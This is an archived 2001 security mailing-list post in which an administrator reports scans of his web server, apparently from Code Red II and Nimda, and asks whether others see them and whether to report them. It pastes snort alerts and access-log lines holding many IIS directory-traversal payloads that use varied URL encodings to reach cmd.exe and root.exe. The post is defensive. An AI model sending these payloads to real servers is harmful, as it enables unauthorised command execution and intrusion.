I started picking these up at about 9:15 CST, looks like someone is trying to exploit the Code Red II backdoor.
9/18/01 9:22:24 AM, Togan Muftuoglu
Hi,
I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's.
1) Anyone else getting similar things or is me ? 2) Is it worth to bother sending these logs to the provider of the ip's ?
TIA
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:39 gardiyan last message repeated 3 times
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
-- Togan Muftuoglu
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com